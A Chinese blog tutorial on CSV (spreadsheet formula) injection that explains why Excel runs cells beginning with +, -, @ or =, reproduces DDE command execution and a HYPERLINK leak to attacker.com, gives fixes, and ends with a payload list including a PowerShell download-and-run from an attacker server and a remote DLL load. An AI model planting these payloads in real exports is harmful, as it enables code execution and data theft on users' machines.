CSV注入

最新推荐文章于 2024-05-14 09:37:06 发布
最新推荐文章于 2024-05-14 09:37:06 发布
阅读量2.2k 收藏
点赞数
文章标签: excel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43025534/article/details/130367375
版权

CSV 介绍

CSV 是“Comma-Separated Values”的缩写,是一种常见的数据格式。CSV 文件通常包含一系列以逗号分隔的值,每个值都表示数据的一个字段。这种数据格式常用于将数据从一个应用程序或系统转移到另一个应用程序或系统,因为它易于生成和解析,并且不依赖于特定的操作系统或软件。

CSV 文件可以使用任何文本编辑器打开和编辑,也可以使用 Excel 打开。在 CSV 文件中,每个字段之间都用逗号分隔,行末通常用回车符和换行符表示。每一行表示数据的一条记录,每个字段表示记录中的一个属性。

举例如下,将如下内容保存为1.csv

Name, Age, Gender
Alice, 25, Female
Bob, 30, Male
Charlie, 40, Male

打开后如下

Imagecsv

漏洞介绍

既然是注入,就说明也是将恶意代码插入到某个地方,这里就是将恶意代码插入到 CSV 文件中。

当在 Excel 中打开 CSV 文件时,文件会从 CSV 描述转变为原始的 Excel 格式,包括 Excel 提供的所有动态功能。在这个过程中,CSV 中的所有 Excel 公式都会执行。

简单来说,如果单元格中的第一个字符是+-@=这些符号时,就会被当成公式来执行。

CSV 注入(公式注入)攻击就是利用了 Excel 软件的自动计算功能,以执行 Excel 公式中的代码。攻击者可以通过修改 CSV 文件中的内容,注入包含恶意代码的 Excel 公式,或者通过在 Excel 公式中使用外部数据源,将恶意代码注入到目标系统中,从而对用户实施攻击。

漏洞危害

主要攻击的是用户,对服务端几乎无影响

普通用户在打开恶意的 CSV 文件并忽略弹窗提示后,通常会造成如下危害:

  1. 命令执行
  2. 敏感信息泄漏

漏洞复现

命令执行

=1+cmd|' /C calc'!A0

编辑内容如下:

Image2.csv

打开文档

Image选择启用

Image选择是

这样就可以成功执行了系统命令

Image执行系统命令

信息泄漏

=HYPERLINK("http://attacker.com/?param1=value1&param2="&A1&"@attacker.com")

内容如下:

Image2.csv

打开 CSV 后,可见 A1 的值被添加到了 URL 中

ImageA1

用户只要点击这个 URL,就会携带A1的值向恶意网站发起请求,造成信息泄漏。

修复建议

  • 单元格不以特殊字符开头:+-@=0x09(Tab)0x0D(回车)
  • 在生成 CSV 时,给每个字段前添加',且给每一个字段内容用双引号引起来
  • 加强员工安全意识培训,禁用 DDE 协议

常见漏洞点

如果网站存在导出 CSV 功能,且导出内容可控,那么我们就可以将可控的内容修改为 payload,让正常用户导出后打开,即可触发。

说明

如何开启 DDE

高版本的 office 默认禁止 DDE,无法执行,开启方法如下:

Image开启DDE

导出 xlsx 文件也存在这个问题吗

与 CSV 注入类似,也存在类似的问题,因为都是利用 Excel 公式语法执行系统命令。

实际危害大吗

不大,因为利用非常鸡肋,大多数 SRC 都不收。

各种 Payload

# RCE
=cmd|' /C calc'!A0
+cmd|' /C calc'!A0
-cmd|' /C calc'!A0
@SUM(cmd|'/c calc'!A0)

=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
=10+20+cmd|' /C calc'!A0
@SUM(1+9)*cmd|' /C calc'!A0

# 信息泄漏
=HYPERLINK("http://attacker.com/?param1=value1&param2="&A1&"@attacker.com")

参考

  • CSV Injection
初始安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
csv命令注入示例1111111111111111
02-13
csv命令注入示例1111111111111111
csv注入文件
HoAd'blog
08-06 589
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
Web 安全之 CSV 注入攻击详解
最新发布
cc123489ll的博客
05-14 384
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击是攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击者利用在 CSV 文件中注入恶意代码。
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4766
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
CSV注入漏洞】
SHUY96的博客
12-30 1711
一、背景 最近在开发中,遇到CSV注入漏洞,特此研究一下。我们知道“对于网络安全来说,一切的外部输入都是不可信的”,但在我们大脑的第一印象中会把csv文件当做是普通的文件,未对其保持足够的警惕,从而引起安全漏洞问题。 二、定义 攻击人员通过在CSV中构造恶意的命令或函数,当正常用户使用Excel打开这个CSV文件时,恶意的命令或函数被执行,从而导致攻击的行为。 三、产生原因 1、CSV文件中的几个特殊字符+、-、@、=都可用于在Microsoft Excel中触发公式解释 例如:在CSV单元格中输入“=1+
JAVA解决CSV注入漏洞的代码
搬砖人生的博客
10-29 3481
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
10-26
JAVA项目实践,URL存在跨站漏洞,注入漏洞解决方案.docx
VB读CSV到mysql_VB读取CSV到mysql_源码
09-30
可能需要使用参数化查询以防止SQL注入。 5. **事务处理**:为了确保数据的完整性和一致性,可能会使用数据库事务来批量处理数据插入。 6. **错误处理**:编写错误处理代码,捕获可能出现的问题,如网络中断、...
Shell脚本批量添加CSV数据到MySQL
07-23
2. SQL注入:在构建动态SQL语句时,避免SQL注入攻击,可以使用参数化查询或预编译语句。 3. 错误处理:在脚本中加入错误检查和处理机制,如捕获并记录执行失败的行。 4. 批量插入:为了提高性能,可以考虑使用批量...
decs:Diergo Easy CSV Streamable
03-22
由于这些工具没有直接的依赖关系,因此您可以通过创建新的lambda或功能接口并将其注入到映射和过滤器中来简单地扩展它以满足您的需要: BiConsumer< String> logger = (line, error) - > LoggerFactory ....
csv注入java怎么解决_csv注入利用和绕过总结
weixin_28802509的博客
02-27 2141
csv注入csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。漏洞原理漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。所以当我们输入=1+1时,excel会自动将其计算那么利用这个办法,把等...
csv注入漏洞原理&&实战
weixin_30836759的博客
08-03 1892
前言 为了找工作,巩固巩固知识。本文会介绍 csv 注入漏洞的原理,最后给出一个示例。 正文 在 csv 文件 和 xlsx 文件中的每一项的值如果是 =, @, +, - 就会被 excel 识别为一个 公式, 此时可以注入 系统命令 实现 命令执行。 常用 payload : =cmd|'/c calc'!A0 # 弹计算器 =MSEXCEL|'\..\..\..\Windows\S...
跟着开源项目学java3-从导出excel防止csv注入的提交看注入类的安全问题的解决思路
qq_39007838的博客
12-26 1338
csv注入 若依 common-utils
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至。
05-01 4066
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
Java中去除字符串中的空格、回车、换行符、制表符等特殊字符
热门推荐
技术人集结地
12-08 3万+
在日常开发中,空格、回车、换行符等一些特殊字符经常会困扰着我们对于数据的比较,在存取的时候去除掉这些没有意义的特殊字符就变得非常必要了。对于Java中的String.trim(),它只能去除掉字符串前面和后面的空格一些简单的特殊字符,如果有多个特殊字符的时候,效果非常差,这样就需要我们用一些特殊的方法来进行相应的处理了,这里我们介绍的是通过正则表达式的方式来进行字符串中特殊字符的处理。 首先,我们科普一下正则表达式中的一些特殊字符的表示方法:
java中如何对CSV注入进行输入验证、输出过滤以及使用安全的CSV解析库
06-09
Java中,可以通过以下方式来对CSV注入进行输入验证、输出过滤以及使用安全的CSV解析库: 1. 输入验证 在读取CSV数据之前,应该对用户输入进行验证,主要包括以下方面: - 数据类型:验证输入数据的类型是否正确...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值